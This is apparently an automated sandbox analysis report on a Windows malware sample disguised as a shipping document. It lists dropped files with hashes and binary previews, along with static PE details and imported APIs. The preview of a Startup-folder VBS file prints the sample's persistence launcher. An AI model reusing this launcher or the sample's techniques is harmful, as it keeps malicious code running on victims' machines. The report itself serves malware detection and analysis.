.....N.T`..O?%....=/.-\|..k`..:X.0^v3....=.^;...UP.L.....7L.L.\|..(...{..k........+.....^....e.x73...7.K=R...w6.....S...........K3...*O3.1..zRK...;.k.Q{.o....Uj?.A>.@....Nm3..j.z...l..z.p.B....;?J...O..s.L.....@.v_$..0.A}w..nYq.F..]t.g..!<.$...Dz0..2...E.2....j.n.....!..v.

C:\Users\user\AppData\Local\Temp\aut816D.tmp

Download File

Process:	C:\Users\user\AppData\Local\cyclop\juvenile.exe
File Type:	data
Category:	dropped
Size (bytes):	267276
Entropy (8bit):	7.977089330325887
Encrypted:	false
SSDEEP:	6144:ZuGk22/iYQpcjvYeqisYf90vDBAMl6tNwrsTh4ksOm1o:0J22/nQajwOsY2vFV6asacP
MD5:	4566379D6341E7F75730F7A237587F0B
SHA1:	6C5279E99869DFE7BA38513457B58258FAE4BFBA
SHA-256:	F001C88DC939A1ACD8E8BB23AB215E5DEEF4BF963A8729FE5C3DD79E05E447B0
SHA-512:	B382E72928626BB5F7AEA2C1D59C54ECD3AB65BB091DBD75B0C0894E57569168EB2E4F97AF48B7361DCD6BACD506E1F792964FB35B60E6D3D3E6BD146E9886DE
Malicious:	false
Reputation:	low
Preview:	EA06......yS....O.L)..n..2.S.....0....`.B.X........\|]`.B.]..f.J...._.....@.P$..t..].J.si.vYn.M"..}z.+...W...7....9.n$....d.Jw..../.P...5.m1..tSz..L...[.t"g..."ri.8...[k....E2.......mZ.<@(>>...7..`.zM>.1.Rd....#[J...=..i5..ReX.M..+.<.......B.v..`....O..(f.....6.6.R):..^eZ.M.3i.aT..<5.MJ..1.0.g\|.....x....F....d.5I.......~..]>..)..na...}..d.,..%.J...5..MJ..Q....M.U1..%.j....(\|.(.......\|...&.<.Q. .....(X.t......U..><M.U&.N...W.......`....Q.B@.>..O........s.E;....+._..m..M.5ZM?.Z..u...3N.g._...1...._.&.[M....<."s....T...aO....>n.b.Q..:.K.\|!?:..!....3.,..[.bi....R.K&....]..F..+........We!...nf.......y...Q.\9..v.Q1........9.Niu.vVc...j3m..o...v..\|#...u........(7..VvRKT.......>$.... .....N.T`..O?%....=/.-\|..k`..:X.0^v3....=.^;...UP.L.....7L.L.\|..(...{..k........+.....^....e.x73...7.K=R...w6.....S...........K3...*O3.1..zRK...;.k.Q{.o....Uj?.A>.@....Nm3..j.z...l..z.p.B....;?J...O..s.L.....@.v_$..0.A}w..nYq.F..]t.g..!<.$...Dz0..2...E.2....j.n.....!..v.

C:\Users\user\AppData\Local\Temp\aut8AB4.tmp

Download File

Process:	C:\Users\user\AppData\Local\cyclop\juvenile.exe
File Type:	data
Category:	dropped
Size (bytes):	267276
Entropy (8bit):	7.977089330325887
Encrypted:	false
SSDEEP:	6144:ZuGk22/iYQpcjvYeqisYf90vDBAMl6tNwrsTh4ksOm1o:0J22/nQajwOsY2vFV6asacP
MD5:	4566379D6341E7F75730F7A237587F0B
SHA1:	6C5279E99869DFE7BA38513457B58258FAE4BFBA
SHA-256:	F001C88DC939A1ACD8E8BB23AB215E5DEEF4BF963A8729FE5C3DD79E05E447B0
SHA-512:	B382E72928626BB5F7AEA2C1D59C54ECD3AB65BB091DBD75B0C0894E57569168EB2E4F97AF48B7361DCD6BACD506E1F792964FB35B60E6D3D3E6BD146E9886DE
Malicious:	false
Reputation:	low
Preview:	EA06......yS....O.L)..n..2.S.....0....`.B.X........\|]`.B.]..f.J...._.....@.P$..t..].J.si.vYn.M"..}z.+...W...7....9.n$....d.Jw..../.P...5.m1..tSz..L...[.t"g..."ri.8...[k....E2.......mZ.<@(>>...7..`.zM>.1.Rd....#[J...=..i5..ReX.M..+.<.......B.v..`....O..(f.....6.6.R):..^eZ.M.3i.aT..<5.MJ..1.0.g\|.....x....F....d.5I.......~..]>..)..na...}..d.,..%.J...5..MJ..Q....M.U1..%.j....(\|.(.......\|...&.<.Q. .....(X.t......U..><M.U&.N...W.......`....Q.B@.>..O........s.E;....+._..m..M.5ZM?.Z..u...3N.g._...1...._.&.[M....<."s....T...aO....>n.b.Q..:.K.\|!?:..!....3.,..[.bi....R.K&....]..F..+........We!...nf.......y...Q.\9..v.Q1........9.Niu.vVc...j3m..o...v..\|#...u........(7..VvRKT.......>$.... .....N.T`..O?%....=/.-\|..k`..:X.0^v3....=.^;...UP.L.....7L.L.\|..(...{..k........+.....^....e.x73...7.K=R...w6.....S...........K3...*O3.1..zRK...;.k.Q{.o....Uj?.A>.@....Nm3..j.z...l..z.p.B....;?J...O..s.L.....@.v_$..0.A}w..nYq.F..]t.g..!<.$...Dz0..2...E.2....j.n.....!..v.

C:\Users\user\AppData\Local\Temp\autB07B.tmp

Download File

Process:	C:\Users\user\AppData\Local\cyclop\juvenile.exe
File Type:	data
Category:	dropped
Size (bytes):	267276
Entropy (8bit):	7.977089330325887
Encrypted:	false
SSDEEP:	6144:ZuGk22/iYQpcjvYeqisYf90vDBAMl6tNwrsTh4ksOm1o:0J22/nQajwOsY2vFV6asacP
MD5:	4566379D6341E7F75730F7A237587F0B
SHA1:	6C5279E99869DFE7BA38513457B58258FAE4BFBA
SHA-256:	F001C88DC939A1ACD8E8BB23AB215E5DEEF4BF963A8729FE5C3DD79E05E447B0
SHA-512:	B382E72928626BB5F7AEA2C1D59C54ECD3AB65BB091DBD75B0C0894E57569168EB2E4F97AF48B7361DCD6BACD506E1F792964FB35B60E6D3D3E6BD146E9886DE
Malicious:	false
Reputation:	low
Preview:	EA06......yS....O.L)..n..2.S.....0....`.B.X........\|]`.B.]..f.J...._.....@.P$..t..].J.si.vYn.M"..}z.+...W...7....9.n$....d.Jw..../.P...5.m1..tSz..L...[.t"g..."ri.8...[k....E2.......mZ.<@(>>...7..`.zM>.1.Rd....#[J...=..i5..ReX.M..+.<.......B.v..`....O..(f.....6.6.R):..^eZ.M.3i.aT..<5.MJ..1.0.g\|.....x....F....d.5I.......~..]>..)..na...}..d.,..%.J...5..MJ..Q....M.U1..%.j....(\|.(.......\|...&.<.Q. .....(X.t......U..><M.U&.N...W.......`....Q.B@.>..O........s.E;....+._..m..M.5ZM?.Z..u...3N.g._...1...._.&.[M....<."s....T...aO....>n.b.Q..:.K.\|!?:..!....3.,..[.bi....R.K&....]..F..+........We!...nf.......y...Q.\9..v.Q1........9.Niu.vVc...j3m..o...v..\|#...u........(7..VvRKT.......>$.... .....N.T`..O?%....=/.-\|..k`..:X.0^v3....=.^;...UP.L.....7L.L.\|..(...{..k........+.....^....e.x73...7.K=R...w6.....S...........K3...*O3.1..zRK...;.k.Q{.o....Uj?.A>.@....Nm3..j.z...l..z.p.B....;?J...O..s.L.....@.v_$..0.A}w..nYq.F..]t.g..!<.$...Dz0..2...E.2....j.n.....!..v.

C:\Users\user\AppData\Local\Temp\autB984.tmp

Download File

Process:	C:\Users\user\AppData\Local\cyclop\juvenile.exe
File Type:	data
Category:	dropped
Size (bytes):	267276
Entropy (8bit):	7.977089330325887
Encrypted:	false
SSDEEP:	6144:ZuGk22/iYQpcjvYeqisYf90vDBAMl6tNwrsTh4ksOm1o:0J22/nQajwOsY2vFV6asacP
MD5:	4566379D6341E7F75730F7A237587F0B
SHA1:	6C5279E99869DFE7BA38513457B58258FAE4BFBA
SHA-256:	F001C88DC939A1ACD8E8BB23AB215E5DEEF4BF963A8729FE5C3DD79E05E447B0
SHA-512:	B382E72928626BB5F7AEA2C1D59C54ECD3AB65BB091DBD75B0C0894E57569168EB2E4F97AF48B7361DCD6BACD506E1F792964FB35B60E6D3D3E6BD146E9886DE
Malicious:	false
Preview:	EA06......yS....O.L)..n..2.S.....0....`.B.X........\|]`.B.]..f.J...._.....@.P$..t..].J.si.vYn.M"..}z.+...W...7....9.n$....d.Jw..../.P...5.m1..tSz..L...[.t"g..."ri.8...[k....E2.......mZ.<@(>>...7..`.zM>.1.Rd....#[J...=..i5..ReX.M..+.<.......B.v..`....O..(f.....6.6.R):..^eZ.M.3i.aT..<5.MJ..1.0.g\|.....x....F....d.5I.......~..]>..)..na...}..d.,..%.J...5..MJ..Q....M.U1..%.j....(\|.(.......\|...&.<.Q. .....(X.t......U..><M.U&.N...W.......`....Q.B@.>..O........s.E;....+._..m..M.5ZM?.Z..u...3N.g._...1...._.&.[M....<."s....T...aO....>n.b.Q..:.K.\|!?:..!....3.,..[.bi....R.K&....]..F..+........We!...nf.......y...Q.\9..v.Q1........9.Niu.vVc...j3m..o...v..\|#...u........(7..VvRKT.......>$.... .....N.T`..O?%....=/.-\|..k`..:X.0^v3....=.^;...UP.L.....7L.L.\|..(...{..k........+.....^....e.x73...7.K=R...w6.....S...........K3...*O3.1..zRK...;.k.Q{.o....Uj?.A>.@....Nm3..j.z...l..z.p.B....;?J...O..s.L.....@.v_$..0.A}w..nYq.F..]t.g..!<.$...Dz0..2...E.2....j.n.....!..v.

C:\Users\user\AppData\Local\Temp\gammy

Download File

Process:	C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe
File Type:	data
Category:	dropped
Size (bytes):	267776
Entropy (8bit):	7.901646270897717
Encrypted:	false
SSDEEP:	6144:o5gy3pIb4QGogF518foPatDiKTi4G2JJvWdI:ob3pWCE8aQMx
MD5:	F75ABA8B3455BAF855CBFE566D51E9AB
SHA1:	6453EB3C2A9C7FB6BFEC2C747EDEA1EBC6F07D47
SHA-256:	65283DF1E03117DC2949EC1574C122AE931124227BD3F02D9E5EC612C657E170
SHA-512:	C45D4274BFE5046871E45C4E5DDC1844103DD4B840FF963B858091BF28931EAA3BA75328D3C36FDA64CC4B298245EB2D0EE2A763B223BDEA6BF717A12EBE038E
Malicious:	false
Preview:	{i.0WBIO20HI..U2.N6Q63Z0.BIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q.3Z0Z].A6.A.s.T~.ob9_@z@&-.=W]h36;],nT4.A/^t+'or..i?71WvC;[.3Z0TBIO^ .d~).Lt?./.B.Nfa61.A.7Y..Ls?./.B.N.3.1..&7N).Ljm_/.B.Nfa21.A.7.16Zt?./63Z0TBIO60HIRXU2.._763Z0..IOz1LI&.UbXN6Q63Z0.BjN=1AIR.T2X44Q63Z0{.IO6 HIR.T2XNvQ6#Z0T@IO30HIRXU2]N6Q63Z0T"MO64HI.cW2ZN6.63J0TRIO60XIRHU2XN6Q&3Z0TBIO60HI.MW2.N6Q6SX0..HO60HIRXU2XN6Q63Z0TBIO60HI..T2DN6Q63Z0TBIO60HIRXU2XN6Q63Z0.OKOv0HIRXU2XN6Q6.[0.CIO60HIRXU2XN6Q63Z0TBIO60HI\|,0J,N6Q..[0TRIO6.IIR\U2XN6Q63Z0TBIO.0H)\|1S,/6Q.^Z0T.HO6^HIR.T2XN6Q63Z0TBIOv0H.\|<4F9N6Q..Z0TbKO6&HIRRW2XN6Q63Z0TBIOv0H.\|*&@;N6Q..[0T"KO6.IIRxW2XN6Q63Z0TBIOv0H.RXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q63Z0TBIO60HIRXU2XN6Q

C:\Users\user\AppData\Local\cyclop\juvenile.exe

Download File

Process:	C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1199616
Entropy (8bit):	7.1309049376009455
Encrypted:	false
SSDEEP:	24576:vtb20pkaCqT5TBWgNQ7aD9FUqHPD9CUZ0GxiVUW6A:sVg5tQ7aD7UqH5zmGQp5
MD5:	E53EAA2914DC091F2E146B5665775EAA
SHA1:	E7431B4B6BD6AB4E55E5CEA816407F4A22C733D8
SHA-256:	9D954B672FCD0B4E6BDF5E34F0C27E8A8DD6E0984D28CFA27924DEE457F34FCD
SHA-512:	BD423AFA7DE723633C546EEB2DD152E1255F561326B44968EBEE93A2DC24A8B211DD6227AA40A6033C3D1169B66DF9947977665B49ABCA84B7857D4D5A28654F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L.....<g..........".................t_............@..................................l....@...@.......@......................p..\|....@..........................Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc..t...........................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Download File

Process:	C:\Users\user\AppData\Local\cyclop\juvenile.exe
File Type:	data
Category:	dropped
Size (bytes):	276
Entropy (8bit):	3.4040921416166188
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclzXUEZ+lX1GlfFpAdA6nriIM8lfQVn:DsO+vNlDQ1tFmA2n
MD5:	EF3B9C5060B7C02F6564EC234B5515EE
SHA1:	4496F1B22F3EB912CB2EA42A2DAB6CE698F60AD6
SHA-256:	FFDC9932BD99298CC6893A0C6BE4DD8F572B5DF8C786E240C7698999D548663E
SHA-512:	29A0E9405593E2A0592C14171E144316AC30B86668A2BBF5338E105F7D5B8558EE3044FA019F205AAFB84F4F841F0A9A3825D57EC602018E76FD285F04C4AB25
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.c.y.c.l.o.p.\.j.u.v.e.n.i.l.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.1309049376009455
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe
File size:	1'199'616 bytes
MD5:	e53eaa2914dc091f2e146b5665775eaa
SHA1:	e7431b4b6bd6ab4e55e5cea816407f4a22c733d8
SHA256:	9d954b672fcd0b4e6bdf5e34f0c27e8a8dd6e0984d28cfa27924dee457f34fcd
SHA512:	bd423afa7de723633c546eeb2dd152e1255f561326b44968ebee93a2dc24a8b211dd6227aa40a6033c3d1169b66df9947977665b49abca84b7857d4d5a28654f
SSDEEP:	24576:vtb20pkaCqT5TBWgNQ7aD9FUqHPD9CUZ0GxiVUW6A:sVg5tQ7aD7UqH5zmGQp5
TLSH:	D145C01373DE8360C3B25273BA65B701AEBB782506B5F96B2FD4093DE820162525E773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673CA498 [Tue Nov 19 14:45:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F626540849Fh
jmp 00007F62653FB4B4h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F62653FB63Ah
cmp edi, eax
jc 00007F62653FB99Eh
bt dword ptr [004C0158h], 01h
jnc 00007F62653FB639h
rep movsb
jmp 00007F62653FB94Ch
cmp ecx, 00000080h
jc 00007F62653FB804h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F62653FB640h
bt dword ptr [004BA370h], 01h
jc 00007F62653FBB10h
bt dword ptr [004C0158h], 00000000h
jnc 00007F62653FB7DDh
test edi, 00000003h
jne 00007F62653FB7EEh
test esi, 00000003h
jne 00007F62653FB7CDh
bt edi, 02h
jnc 00007F62653FB63Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F62653FB643h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F62653FB695h
bt esi, 03h
jnc 00007F62653FB6E8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x5bdb8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x120000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x5bdb8	0x5be00	d565be0efbad8021ebe34874b9647465	False	0.9288504464285714	data	7.896029501064533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x120000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x530bd	data			1.0003263199052201
RT_GROUP_ICON	0x11f878	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11f8f0	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11f904	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11f918	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11f92c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11fa08	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, 